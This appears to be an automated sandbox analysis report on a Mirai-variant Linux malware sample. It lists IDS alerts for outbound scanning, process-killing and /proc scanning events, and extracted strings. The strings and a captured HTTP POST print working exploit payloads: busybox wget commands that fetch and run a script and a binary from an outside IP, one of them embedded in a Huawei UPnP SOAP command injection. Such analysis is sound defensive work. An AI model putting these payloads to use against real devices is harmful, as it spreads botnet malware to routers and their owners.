ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.186.122

Timestamp:	192.168.2.2388.221.186.12234042802839471 05/27/22-12:31:43.549751
SID:	2839471
Source Port:	34042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.77.153.13

Timestamp:	192.168.2.2395.77.153.1350944802839471 05/27/22-12:31:34.999503
SID:	2839471
Source Port:	50944
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.232.101

Timestamp:	192.168.2.2395.217.232.10152404802839471 05/27/22-12:33:43.043686
SID:	2839471
Source Port:	52404
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.249.6.182

Timestamp:	192.168.2.2395.249.6.18243248802839471 05/27/22-12:31:19.925251
SID:	2839471
Source Port:	43248
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.135.194.129

Timestamp:	192.168.2.23112.135.194.12947528802839471 05/27/22-12:32:27.557736
SID:	2839471
Source Port:	47528
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.140.155.240

Timestamp:	192.168.2.2395.140.155.24039534802839471 05/27/22-12:31:11.848254
SID:	2839471
Source Port:	39534
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.67.8.56

Timestamp:	192.168.2.2395.67.8.5649576802839471 05/27/22-12:31:54.770414
SID:	2839471
Source Port:	49576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.251.196

Timestamp:	192.168.2.2395.163.251.19650388802839471 05/27/22-12:32:24.131657
SID:	2839471
Source Port:	50388
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.225.222.132

Timestamp:	192.168.2.2388.225.222.13260712802839471 05/27/22-12:32:44.015755
SID:	2839471
Source Port:	60712
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.205.207

Timestamp:	192.168.2.2388.99.205.20749030802839471 05/27/22-12:33:00.999487
SID:	2839471
Source Port:	49030
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.214.95.185

Timestamp:	192.168.2.2395.214.95.18560942802839471 05/27/22-12:31:45.629413
SID:	2839471
Source Port:	60942
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.203.102.187

Timestamp:	192.168.2.2388.203.102.18741940802839471 05/27/22-12:31:31.123524
SID:	2839471
Source Port:	41940
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.109.137.162

Timestamp:	192.168.2.2388.109.137.16250882802839471 05/27/22-12:32:56.716771
SID:	2839471
Source Port:	50882
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.9.242.104

Timestamp:	192.168.2.2395.9.242.10437384802839471 05/27/22-12:33:09.302194
SID:	2839471
Source Port:	37384
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.61.204.220

Timestamp:	192.168.2.2395.61.204.22037348802839471 05/27/22-12:32:36.837881
SID:	2839471
Source Port:	37348
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.71.129.220

Timestamp:	192.168.2.2395.71.129.22054036802839471 05/27/22-12:33:56.718060
SID:	2839471
Source Port:	54036
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.86.215.220

Timestamp:	192.168.2.2388.86.215.22060870802839471 05/27/22-12:31:45.496953
SID:	2839471
Source Port:	60870
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.209.132.118

Timestamp:	192.168.2.2395.209.132.11833830802839471 05/27/22-12:33:58.194099
SID:	2839471
Source Port:	33830
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.236.22

Timestamp:	192.168.2.2388.221.236.2257688802839471 05/27/22-12:32:16.195697
SID:	2839471
Source Port:	57688
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.229.33

Timestamp:	192.168.2.2395.101.229.3341400802839471 05/27/22-12:31:09.563382
SID:	2839471
Source Port:	41400
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.149.176.152

Timestamp:	192.168.2.2388.149.176.15243380802839471 05/27/22-12:32:16.195035
SID:	2839471
Source Port:	43380
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.208.139

Timestamp:	192.168.2.2395.101.208.13949116802839471 05/27/22-12:34:13.943690
SID:	2839471
Source Port:	49116
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.225.198

Timestamp:	192.168.2.2395.100.225.19844024802839471 05/27/22-12:31:06.356024
SID:	2839471
Source Port:	44024
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.159.43.113

Timestamp:	192.168.2.2395.159.43.11338992802839471 05/27/22-12:32:59.949064
SID:	2839471
Source Port:	38992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.216.185.99

Timestamp:	192.168.2.2388.216.185.9945494802839471 05/27/22-12:31:24.036858
SID:	2839471
Source Port:	45494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.227.36

Timestamp:	192.168.2.2395.101.227.3638306802839471 05/27/22-12:34:15.292281
SID:	2839471
Source Port:	38306
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.202.224.45

Timestamp:	192.168.2.2388.202.224.4533472802839471 05/27/22-12:34:17.743999
SID:	2839471
Source Port:	33472
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.232.73

Timestamp:	192.168.2.2395.179.232.7353852802839471 05/27/22-12:31:56.918991
SID:	2839471
Source Port:	53852
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.130.126.25

Timestamp:	192.168.2.2395.130.126.2559386802839471 05/27/22-12:31:15.003635
SID:	2839471
Source Port:	59386
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.20.130

Timestamp:	192.168.2.23112.124.20.13054500802839471 05/27/22-12:31:23.574128
SID:	2839471
Source Port:	54500
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.106.79

Timestamp:	192.168.2.2395.101.106.7939324802839471 05/27/22-12:31:34.935665
SID:	2839471
Source Port:	39324
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.48.238

Timestamp:	192.168.2.2395.100.48.23837708802839471 05/27/22-12:33:40.003945
SID:	2839471
Source Port:	37708
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.245.107.155

Timestamp:	192.168.2.2395.245.107.15543538802839471 05/27/22-12:31:56.958042
SID:	2839471
Source Port:	43538
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.149.24

Timestamp:	192.168.2.2395.100.149.2437798802839471 05/27/22-12:33:06.925655
SID:	2839471
Source Port:	37798
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.148.79.180

Timestamp:	192.168.2.2388.148.79.18059856802839471 05/27/22-12:32:49.499358
SID:	2839471
Source Port:	59856
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.187.174.204

Timestamp:	192.168.2.23112.187.174.20457618802839471 05/27/22-12:31:23.569091
SID:	2839471
Source Port:	57618
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.249.121.153

Timestamp:	192.168.2.2388.249.121.15335810802839471 05/27/22-12:33:32.552249
SID:	2839471
Source Port:	35810
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.18.254.57

Timestamp:	192.168.2.2395.18.254.5759420802839471 05/27/22-12:33:03.227728
SID:	2839471
Source Port:	59420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.84.184.123

Timestamp:	192.168.2.23112.84.184.12345694802839471 05/27/22-12:33:25.000957
SID:	2839471
Source Port:	45694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.201.52.51

Timestamp:	192.168.2.2388.201.52.5153612802839471 05/27/22-12:31:21.447416
SID:	2839471
Source Port:	53612
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.84.220.99

Timestamp:	192.168.2.23112.84.220.9939174802839471 05/27/22-12:32:02.417435
SID:	2839471
Source Port:	39174
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.186.69

Timestamp:	192.168.2.23112.197.186.6934310802839471 05/27/22-12:34:17.929289
SID:	2839471
Source Port:	34310
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.156.50

Timestamp:	192.168.2.2395.110.156.5059712802839471 05/27/22-12:31:56.929753
SID:	2839471
Source Port:	59712
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.65.15.147

Timestamp:	192.168.2.2395.65.15.14756142802839471 05/27/22-12:32:36.806859
SID:	2839471
Source Port:	56142
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.77.31

Timestamp:	192.168.2.2395.56.77.3144018802839471 05/27/22-12:31:01.178429
SID:	2839471
Source Port:	44018
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.173.11

Timestamp:	192.168.2.2388.99.173.1142122802839471 05/27/22-12:34:00.363964
SID:	2839471
Source Port:	42122
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.184.22.97

Timestamp:	192.168.2.23112.184.22.9750054802839471 05/27/22-12:34:15.300043
SID:	2839471
Source Port:	50054
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.17.60.219

Timestamp:	192.168.2.23112.17.60.21942544802839471 05/27/22-12:31:26.982240
SID:	2839471
Source Port:	42544
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.10.28

Timestamp:	192.168.2.2395.100.10.2841958802839471 05/27/22-12:34:29.402917
SID:	2839471
Source Port:	41958
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.136.69

Timestamp:	192.168.2.2388.198.136.6953612802839471 05/27/22-12:31:29.021624
SID:	2839471
Source Port:	53612
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.202.59

Timestamp:	192.168.2.23112.124.202.5949138802839471 05/27/22-12:32:33.941935
SID:	2839471
Source Port:	49138
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.177.75.25

Timestamp:	192.168.2.23112.177.75.2539808802839471 05/27/22-12:32:52.499221
SID:	2839471
Source Port:	39808
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.214.189.219

Timestamp:	192.168.2.2388.214.189.21950920802839471 05/27/22-12:31:09.651368
SID:	2839471
Source Port:	50920
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.38.125.78

Timestamp:	192.168.2.2395.38.125.7843592802839471 05/27/22-12:34:00.555290
SID:	2839471
Source Port:	43592
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.230.242

Timestamp:	192.168.2.2395.101.230.24241354802839471 05/27/22-12:32:56.792589
SID:	2839471
Source Port:	41354
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.81.113.147

Timestamp:	192.168.2.2395.81.113.14750458802839471 05/27/22-12:34:04.042063
SID:	2839471
Source Port:	50458
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.165.232.154

Timestamp:	192.168.2.23112.165.232.15442434802839471 05/27/22-12:31:00.635005
SID:	2839471
Source Port:	42434
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.80.109.205

Timestamp:	192.168.2.2395.80.109.20545616802839471 05/27/22-12:33:44.171390
SID:	2839471
Source Port:	45616
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.131.91

Timestamp:	192.168.2.2395.110.131.9152760802839471 05/27/22-12:33:06.964903
SID:	2839471
Source Port:	52760
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.209.121

Timestamp:	192.168.2.2395.217.209.12134086802839471 05/27/22-12:31:19.799060
SID:	2839471
Source Port:	34086
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.225.130

Timestamp:	192.168.2.2395.101.225.13057228802839471 05/27/22-12:31:19.784946
SID:	2839471
Source Port:	57228
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.93.106.224

Timestamp:	192.168.2.2395.93.106.22447370802839471 05/27/22-12:32:21.246012
SID:	2839471
Source Port:	47370
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

HTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 39 35 2e 35 35 2e 31 36 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://45.95.55.16/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2208, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2275, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2281, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2285, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2289, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2294, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1872, result: successful

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2208, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2275, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2281, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2285, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2289, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6238)	SIGKILL sent: pid: 2294, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/qFhgp7xLT7 (PID: 6245)	SIGKILL sent: pid: 1872, result: successful

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.95.55.16 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://45.95.55.16/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://45.95.55.16/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.shMV

Source: classification engine

Classification label: mal76.spre.troj.lin@0/0@0/0

Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1582/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2033/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2275/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/3088/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/6190/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1612/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1579/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1699/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1335/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1698/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2028/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1334/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1576/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2302/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/3236/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2025/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2146/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/910/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/6227/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/912/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/517/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/759/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2307/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/918/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/6245/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1594/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2285/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2281/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1349/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1623/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/761/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1622/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/884/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1983/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2038/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1344/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1465/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1586/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1860/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1463/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2156/exe
